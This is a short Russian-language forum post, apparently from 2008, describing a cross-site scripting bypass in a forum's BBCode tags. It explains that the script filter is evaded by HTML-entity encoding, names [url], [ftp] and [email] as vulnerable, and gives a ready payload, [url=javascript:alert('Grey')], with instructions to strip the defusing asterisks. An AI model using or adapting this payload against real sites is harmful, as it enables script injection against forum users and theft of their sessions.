обойти проще некуда - достаточно перекодировать скрипт:
Код:
javascript:alert('Grey') => HTML (with semicolons): => javascript:alert('Grey')
Уязвимы теги: [url*], [ftp*], [email*].
Эксплуатация: при добавление сообщения, добавляем один из уязвимых тегов.
К примеру [url*]:
Код:
[url*=javascript:alert('Grey')]нажми на меня[/url*]
при переходе по ссылке выполнится скрипт.
Символ "*" - следует убрать.
Последний раз редактировалось Grey; 04.10.2008 в 21:37..